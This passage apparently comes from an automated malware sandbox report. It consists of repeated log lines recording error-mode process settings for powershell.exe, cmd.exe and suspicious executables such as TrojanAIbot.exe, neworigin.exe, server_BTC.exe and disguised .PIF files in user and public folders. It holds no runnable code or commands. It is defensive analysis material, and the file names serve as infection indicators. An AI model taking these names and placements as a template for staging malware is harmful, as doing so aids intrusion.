Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
